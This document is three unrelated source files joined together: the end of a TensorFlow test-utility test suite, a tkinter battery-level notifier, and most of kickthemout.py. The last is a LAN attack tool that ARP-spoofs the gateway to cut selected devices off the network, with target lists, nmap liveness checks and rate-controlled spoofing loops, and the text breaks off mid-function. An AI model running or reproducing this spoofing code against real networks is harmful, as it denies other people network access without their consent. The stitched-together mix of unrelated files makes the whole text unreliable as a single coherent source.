self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
@test_util.run_deprecated_v1
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
@test_util.run_deprecated_v1
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new defeault graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegexp(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
@test_util.run_deprecated_v1
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[0:2], ["setup_graph", "run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
@parameterized.named_parameters(dict(testcase_name="argument",
arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_parameterized_keyword(self, arg):
self.assertEqual(arg, True)
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
  """Regression test: variable sharing across graph/eager runs of one test."""

  def setUp(self):
    pass  # Intentionally does not call TensorFlowTestCase's super()

  @test_util.run_in_graph_and_eager_modes
  def test_no_variable_sharing(self):
    # Creating the same named variable in both modes must not collide,
    # even though setUp() skipped the base-class state reset.
    variable_scope.get_variable(
        name="step_size",
        initializer=np.array(1e-5, np.float32),
        use_resource=True,
        trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
  """Tests for the leak-detection decorators in test_util.

  Each test builds a throwaway inner class that borrows this case's
  assertEqual (the decorators only need an assert-capable `self`), then
  checks that the decorator fails on a genuine leak and passes otherwise.
  """

  def test_no_reference_cycle_decorator(self):

    class ReferenceCycleTest(object):

      def __init__(inner_self):  # pylint: disable=no-self-argument
        inner_self.assertEqual = self.assertEqual  # pylint: disable=invalid-name

      @test_util.assert_no_garbage_created
      def test_has_cycle(self):
        # A list containing itself is only collectable via the cycle GC,
        # which the decorator must report.
        a = []
        a.append(a)

      @test_util.assert_no_garbage_created
      def test_has_no_cycle(self):
        pass

    with self.assertRaises(AssertionError):
      ReferenceCycleTest().test_has_cycle()

    ReferenceCycleTest().test_has_no_cycle()

  @test_util.run_in_graph_and_eager_modes
  def test_no_leaked_tensor_decorator(self):

    class LeakedTensorTest(object):

      def __init__(inner_self):  # pylint: disable=no-self-argument
        inner_self.assertEqual = self.assertEqual  # pylint: disable=invalid-name

      @test_util.assert_no_new_tensors
      def test_has_leak(self):
        # Storing the tensor on self keeps it alive past the test body.
        self.a = constant_op.constant([3.], name="leak")

      @test_util.assert_no_new_tensors
      def test_has_no_leak(self):
        constant_op.constant([3.], name="no-leak")

    # NOTE(review): assertRaisesRegexp is the deprecated spelling of
    # assertRaisesRegex; kept as-is for compatibility with older Pythons.
    with self.assertRaisesRegexp(AssertionError, "Tensors not deallocated"):
      LeakedTensorTest().test_has_leak()
    LeakedTensorTest().test_has_no_leak()

  def test_no_new_objects_decorator(self):

    class LeakedObjectTest(object):

      def __init__(inner_self):  # pylint: disable=no-self-argument
        inner_self.assertEqual = self.assertEqual  # pylint: disable=invalid-name
        inner_self.accumulation = []

      @test_util.assert_no_new_pyobjects_executing_eagerly
      def test_has_leak(self):
        # Appending to instance state grows the live-object count per call.
        self.accumulation.append([1.])

      @test_util.assert_no_new_pyobjects_executing_eagerly
      def test_has_no_leak(self):
        # Rebinding an attribute does not accumulate objects across calls.
        self.not_accumulating = [1.]

    with self.assertRaises(AssertionError):
      LeakedObjectTest().test_has_leak()
    LeakedObjectTest().test_has_no_leak()
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  googletest.main()
|
battery.py | import psutil
from plyer.utils import platform
from plyer import notification
import time
import tkinter
from tkinter import messagebox
from tkinter import *
from tkinter import ttk
from threading import *
import os
import sys
# Terminates the application when invoked (bound to the Exit button and
# the dialog's window-close event).
def quit_prog():
    """Kill the whole process immediately, background threads included."""
    # os._exit (not sys.exit) so the Tk mainloop and the battery-polling
    # loop running on other threads are torn down unconditionally.
    os._exit(1)
# Shows the "running in background" dialog, whose only action is to exit
# the application.
def the_close():
    """Display the post-Apply dialog with an Exit button and block on it."""
    dialog = tkinter.Tk()
    status_text = StringVar()
    status_text.set("The values have been set. The application is running in the background. You can : \n-> Use this window to exit the application, or \n-> Minimize this window to let it run in the background.")
    banner = Message(dialog, textvariable=status_text, width=500)
    banner.grid(row=0, column=0, columnspan=2)
    exit_button = ttk.Button(dialog, text='Exit', command=quit_prog)
    exit_button.grid(padx=100, pady=50, row=4, column=0)
    # Closing the window via the title bar must also kill the process.
    dialog.protocol("WM_DELETE_WINDOW", quit_prog)
    dialog.mainloop()
# raise an error message when called
def error():
    """Show a modal tkinter error dialog about invalid limit values."""
    messagebox.showerror(
        "Error", "The values you have entered are not correct.")
# Runs the exit-dialog GUI on a worker thread so the battery polling loop
# in callback() keeps running.
def threading():
    """Launch the_close() on a daemon-like background thread.

    NOTE(review): this function name shadows the stdlib `threading`
    module at module scope; kept unchanged so existing callers still work.
    """
    gui_worker = Thread(target=the_close)
    gui_worker.start()
# called when 'Apply' button is pressed. Checks if the entered values are
# valid, then proceeds to periodically evaluate the battery status
def callback():
    """Validate the two percentage fields, then poll the battery forever.

    On any invalid input the process re-execs itself via os.execv so the
    GUI restarts from scratch. After successful validation the main window
    is destroyed, the exit dialog is started on a background thread, and
    this function loops indefinitely sending desktop notifications.
    """
    global lower_lim
    try:
        lower_lim = int(e1.get())
    except:
        # Non-numeric input: show the error dialog, then restart the app.
        error()
        os.execv(sys.executable, ['python'] + sys.argv)
    if (not(lower_lim >= 0 and lower_lim <= 100)):
        # Lower limit must be a valid percentage.
        error()
        os.execv(sys.executable, ['python'] + sys.argv)
    global higher_lim
    try:
        higher_lim = int(e2.get())
    except:
        error()
        os.execv(sys.executable, ['python'] + sys.argv)
    if (not(higher_lim >= 0 and higher_lim <= 100 and higher_lim >= lower_lim)):
        # Upper limit must be a percentage and not below the lower limit.
        error()
        os.execv(sys.executable, ['python'] + sys.argv)
    window.destroy()
    # Start the background exit dialog (helper shadows the stdlib
    # `threading` module name).
    threading()
    while (1):
        battery = psutil.sensors_battery()
        # Plugged in and at/above the upper limit: ask to unplug.
        if ((battery.power_plugged == True) and (battery.percent >= higher_lim)):
            notification.notify(
                title='Battery Notifier',
                message='Your Battery Level has crossed ' +
                str(higher_lim) + '%. Please disconnect the charger',
                app_name='Battery Notifier',
                app_icon='./img.' + ('ico' if platform == 'win' else 'png')
            )
        # On battery and at/below the lower limit: ask to plug in.
        if ((battery.power_plugged == False) and (battery.percent <= lower_lim)):
            notification.notify(
                title='Battery Notifier',
                message='Your Battery Level has gone below ' +
                str(lower_lim) + '%. Please connect the charger',
                app_name='Battery Notifier',
                app_icon='./img.' + ('ico' if platform == 'win' else 'png')
            )
        # Re-check the battery state every 15 seconds.
        time.sleep(15)
# this section is setting up the main gui using tkinter
window = tkinter.Tk()
var = StringVar()
label = Message(window, textvariable=var, width=500)
var.set("Use the below fields to set the desired values for the ideal upper and lower limits of battery charge percentage to prolong battery life.")
label.grid(row=0, column=0, columnspan=2)
Label(window, text='Minimum Desired Charging Percentage').grid(row=2)
Label(window, text='Maximum Desired Charging Percentage').grid(row=3)
# Two entry fields pre-filled with the default 40/80 limits.
e1 = Entry(window, bd=3)
e2 = Entry(window, bd=3)
e1.insert(END, '40')
e2.insert(END, '80')
e1.grid(row=2, column=1)
e2.grid(row=3, column=1)
# Module-level defaults, overwritten by callback() once Apply is pressed.
lower_lim = 40
higher_lim = 80
apply_button = ttk.Button(window, text='Apply', command=callback)
apply_button.grid(padx=100, pady=50, row=4, column=0)
# Blocks here until callback() destroys the window.
window.mainloop()
kickthemout.py | #!/usr/bin/env python3
# -.- coding: utf-8 -.-
# kickthemout.py
"""
Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
"""
import os, sys, logging, math, traceback, optparse, threading
from time import sleep
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
try:
    # check whether user is root (POSIX only)
    if os.geteuid() != 0:
        print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END))
        os._exit(1)
except:
    # os.geteuid() is missing on Windows (AttributeError), so the user is
    # probably on Windows: skip the root check entirely.
    pass
def shutdown():
    """Print the goodbye banner and terminate the process immediately."""
    farewell = ('\n\n{}Thanks for dropping by.'
                '\nCatch ya later!{}'.format(GREEN, END))
    print(farewell)
    # Hard exit: spoofing/scanning threads may still be running, so skip
    # normal interpreter cleanup.
    os._exit(1)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  # Shut up scapy!
try:
    from scapy.config import conf
    # Disable IPv6 before scapy.all is imported: quiets warnings and
    # speeds up the import.
    conf.ipv6_enabled = False
    from scapy.all import *
    import scan, spoof, nmap
    from urllib.request import urlopen, Request
except KeyboardInterrupt:
    shutdown()
except:
    # Any other failure here means dependencies are missing or broken.
    print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED))
    print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
    os._exit(1)
# display heading
def heading():
    """Print the KickThemOut ASCII-art banner, credits and version.

    NOTE(review): the banner string is user-visible output and is
    reproduced byte-for-byte; its internal spacing must not be reflowed.
    """
    spaces = " " * 76
    sys.stdout.write(GREEN + spaces + """
 █ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
 █▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ █ ▀▀▀ █
 █▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
 █ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
 █ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
 ▀ ▀ ▀ ▀ ▀▀▀
 """ + END + BLUE +
 '\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
 '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) +
 '\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86))
# loading animation during network scan
def scanningAnimation(text):
    """Animate *text* by uppercasing one rotating character per tick.

    Runs until the module-level flag ``stopAnimation`` becomes True; the
    caller is expected to set that flag from another thread.
    """
    try:
        global stopAnimation
        i = 0
        while stopAnimation is not True:
            tempText = list(text)
            # Wrap the highlight back to the first character.
            if i >= len(tempText):
                i = 0
            tempText[i] = tempText[i].upper()
            tempText = ''.join(tempText)
            # '\r' rewinds to the line start so the next frame overwrites
            # this one in place.
            sys.stdout.write(GREEN + tempText + '\r' + END)
            sys.stdout.flush()
            i += 1
            # NOTE(review): `time` is presumably provided by the
            # `from scapy.all import *` star import (only `sleep` is
            # imported from `time` at the top) — verify.
            time.sleep(0.1)
    except:
        os._exit(1)
# Prints the interactive main menu, one entry at a time.
def optionBanner():
    """Print the numbered menu of kick options with a small reveal delay."""
    print('\nChoose an option from the menu:\n')
    numbered_entries = (
        '\t{}[{}1{}]{} Kick ONE Off',
        '\t{}[{}2{}]{} Kick SOME Off',
        '\t{}[{}3{}]{} Kick ALL Off',
    )
    for entry in numbered_entries:
        sleep(0.2)
        print(entry.format(YELLOW, RED, YELLOW, WHITE))
    sleep(0.2)
    print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE))
# initiate debugging process
def runDebug():
    """Dump diagnostic state after an unexpected crash, then hard-exit.

    Each probe is wrapped in its own try/except so one failing lookup
    does not hide the remaining diagnostics.
    """
    print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END))
    print(
        "{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format(
            RED, END))
    try:
        # Module-level value set during the initial network scan.
        print("Current defaultGatewayMac: " + defaultGatewayMac)
    except:
        print("Failed to print defaultGatewayMac...")
    try:
        # Re-resolve the gateway MAC to see whether the cached one is stale.
        print("Reloading MAC retriever function...")
        regenOnlineIPs()
        print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
    except:
        print("Failed to reload MAC retriever function / to print defaultGatewayMac...")
    try:
        print("Known gateway IP: " + defaultGatewayIP)
    except:
        print("Failed to print defaultGatewayIP...")
    try:
        print("Crash trace: ")
        print(traceback.format_exc())
    except:
        print("Failed to print crash trace...")
    print("DEBUG FINISHED.\nShutting down...")
    # Reset terminal colors before exiting.
    print("{}".format(END))
    os._exit(1)
# make sure there is an internet connection
def checkInternetConnection():
    """Return True if https://google.com answers within 3 seconds, else False.

    Calls shutdown() on Ctrl-C. BUGFIX: the original caught
    ``urllib.URLError`` — but ``urllib`` itself was never imported (only
    ``urllib.request.urlopen``/``Request`` are), so any connection failure
    raised NameError instead of returning False. Catch Exception instead,
    which covers URLError, socket timeouts, and DNS failures.
    """
    try:
        urlopen('https://google.com', timeout=3)
        return True
    except KeyboardInterrupt:
        shutdown()
    except Exception:
        return False
# retrieve network interface
def getDefaultInterface(returnNet=False):
    """Return the default network interface name, or its network in CIDR
    notation when *returnNet* is True, derived from scapy's routing table.

    NOTE(review): returns None implicitly when the best route's netmask is
    shorter than /16 (to_CIDR_notation yields None) — callers should confirm
    they tolerate that.
    """
    def long2net(arg):
        # convert a 32-bit integer netmask to its prefix length
        if (arg <= 0 or arg >= 0xFFFFFFFF):
            raise ValueError("illegal netmask value", hex(arg))
        return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
    def to_CIDR_notation(bytes_network, bytes_netmask):
        # build "a.b.c.d/len"; reject overly broad networks (shorter than /16)
        network = scapy.utils.ltoa(bytes_network)
        netmask = long2net(bytes_netmask)
        net = "%s/%s" % (network, netmask)
        if netmask < 16:
            return None
        return net
    # routes bound to scapy's default interface, excluding /32 host routes
    iface_routes = [route for route in scapy.config.conf.route.routes if route[3] == scapy.config.conf.iface and route[1] != 0xFFFFFFFF]
    # pick the most specific route (largest netmask value)
    network, netmask, _, interface, address = max(iface_routes, key=lambda item:item[1])
    net = to_CIDR_notation(network, netmask)
    if net:
        if returnNet:
            return net
        else:
            return interface
# retrieve default interface MAC address
def getDefaultInterfaceMAC():
    """Return the MAC address of the default interface via scapy, prompting
    the user to type it manually when detection fails or yields an empty
    string."""
    try:
        defaultInterfaceMac = get_if_hwaddr(defaultInterface)
        if defaultInterfaceMac == "" or not defaultInterfaceMac:
            # scapy returned nothing usable — fall back to manual entry
            print(
                "\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(
                    RED, END))
            header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
            return (input(header))
        else:
            return defaultInterfaceMac
    except:
        # request interface MAC address (after failed detection by scapy)
        print("\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
        header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
        return (input(header))
# retrieve gateway IP
def getGatewayIP():
    """Return the LAN gateway's IP address.

    Sends an ICMP packet with TTL 0 so the first hop (the gateway) answers
    with its own address; on any failure, stops the scan animation and asks
    the user to type the IP manually.
    """
    global stopAnimation
    try:
        # TTL 0 forces a time-exceeded reply from the first hop (the gateway)
        getGateway = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
        return getGateway.src
    except:
        # request gateway IP address (after failed detection by scapy)
        stopAnimation = True
        print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END))
        header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
        return (input(header))
# retrieve host MAC address
def retrieveMACAddress(host):
    """Resolve *host*'s MAC address with a broadcast ARP request.

    Returns the MAC string of the first answer, or False when the probe
    fails or no reply arrives within the 2-second timeout.

    BUGFIX: the original had an unreachable ``break`` after ``return`` and,
    when the answer list was empty, fell off the end returning None — which
    callers' ``macAddress == False`` checks never matched, letting a None
    MAC flow into spoof.sendPacket(). Return False explicitly instead.
    """
    try:
        query = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=host)
        ans, _ = srp(query, timeout=2, verbose=0)
        for _, rcv in ans:
            return rcv[Ether].src
        # no ARP reply at all: report failure explicitly
        return False
    except:
        return False
# resolve mac address of each vendor
def resolveMac(mac):
    """Return the vendor name for *mac* from the macvendors.co API, truncated
    to 25 characters; "N/A" on any lookup failure."""
    try:
        # send request to macvendors.co
        req = Request("http://macvendors.co/api/vendorname/" + mac,
                      headers={'User-Agent': "API Browser"})
        raw = urlopen(req).read()
        return raw.decode("utf-8")[:25]
    except KeyboardInterrupt:
        shutdown()
    except:
        return "N/A"
# regenerate online IPs array & configure gateway
def regenOnlineIPs():
    """Rebuild the global ``onlineIPs`` list from ``hostsList`` and, unless it
    was already fixed by the user, (re)detect the gateway MAC — prompting for
    it manually when it cannot be found among the scanned hosts."""
    global onlineIPs, defaultGatewayMac, defaultGatewayMacSet
    onlineIPs = [entry[0] for entry in hostsList]
    if not defaultGatewayMacSet:
        defaultGatewayMac = ""
        for entry in hostsList:
            if entry[0] == defaultGatewayIP:
                defaultGatewayMac = entry[1]
        if defaultGatewayMac == "":
            # request gateway MAC address (after failed detection by scapy)
            print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
            header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
            defaultGatewayMac = input(header)
            defaultGatewayMacSet = True  # don't ask again on later rescans
# scan network
def scanNetwork():
    """Populate the global ``hostsList`` by scanning the default network
    (via scan.scanNetwork), then refresh ``onlineIPs`` and the gateway MAC
    through regenOnlineIPs(). Exits the process if the scan itself fails."""
    global hostsList
    try:
        # call scanning function from scan.py
        hostsList = scan.scanNetwork(getDefaultInterface(True))
    except KeyboardInterrupt:
        # caller handles the interrupt; keep whatever hostsList we had
        pass
    except:
        print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END))
        print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
        os._exit(1)
    regenOnlineIPs()
# non-interactive attack
def nonInteractiveAttack():
    """Attack the IPs supplied via -t/--target without any prompts.

    First verifies each target is alive with an nmap ping scan (-sn), dropping
    dead ones (or exiting if none remain), then ARP-spoofs the survivors in a
    loop until Ctrl-C, after which they are re-ARPed to restore connectivity.
    """
    print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END))
    target = options.targets
    print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target)))
    global stopAnimation
    stopAnimation = False
    t = threading.Thread(target=scanningAnimation, args=('Checking target status...',))
    t.daemon = True
    t.start()
    try:
        nm = nmap.PortScanner()
        counter = 0
        # NOTE(review): `target` is mutated (remove) while being iterated, which
        # can skip checking the entry after a removed one — confirm acceptable.
        for host in target:
            a = nm.scan(hosts=host, arguments='-sn')  # -sn: ping scan, no ports
            if a['scan'] != {}:
                for k, v in a['scan'].items():
                    if str(v['status']['state']) == 'up':
                        pass  # host alive, keep it
                    else:
                        if len(target) == 1 or counter == len(target)-1:
                            # last (or only) target is down -> abort entirely
                            stopAnimation = True
                            sys.stdout.write("\033[K")
                            print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
                            os._exit(1)
                        else:
                            # drop the dead target and continue with the rest
                            sys.stdout.write("\033[K")
                            print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
                            target.remove(host)
                            counter += 1
                            pass
            else:
                # empty scan result: host did not answer the ping scan at all
                if len(target) == 1 or counter == len(target)-1:
                    stopAnimation = True
                    sys.stdout.write("\033[K")
                    print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
                    os._exit(1)
                else:
                    sys.stdout.write("\033[K")
                    print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
                    target.remove(host)
                    counter += 1
                    pass
        stopAnimation = True
        sys.stdout.write("\033[K")  # clear the animation line
        defaultGatewayIP = getGatewayIP()
        defaultGatewayMac = retrieveMACAddress(defaultGatewayIP)
    except KeyboardInterrupt:
        shutdown()
    if options.packets is not None:
        print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
    else:
        print("\n{}Spoofing started... {}".format(GREEN, END))
    try:
        while True:
            # broadcast malicious ARP packets
            for i in target:
                ipAddress = i
                macAddress = retrieveMACAddress(ipAddress)
                if macAddress == False:
                    print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
                    os._exit(1)
                spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress)
            # -p controls the spoofing cadence; default is one round every 10s
            if options.packets is not None:
                time.sleep(60/float(options.packets))
            else:
                time.sleep(10)
    except KeyboardInterrupt:
        # re-arp targets on KeyboardInterrupt exception
        print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END))
        reArp = 1
        while reArp != 10:
            # broadcast ARP packets with legitimate info to restore connection
            for i in target:
                ipAddress = i
                try:
                    macAddress = retrieveMACAddress(ipAddress)
                except:
                    print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
                    os._exit(1)
                try:
                    spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress)
                except KeyboardInterrupt:
                    pass
                except:
                    runDebug()
            reArp += 1
            time.sleep(0.2)
        print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END))
# kick one device
def kickoneoff():
    """Interactively pick one online host and ARP-spoof it off the network.

    Scans the LAN, lists hosts with MAC/vendor/hostname, lets the user pick an
    index, then spoofs until Ctrl-C, after which the victim is re-ARPed with
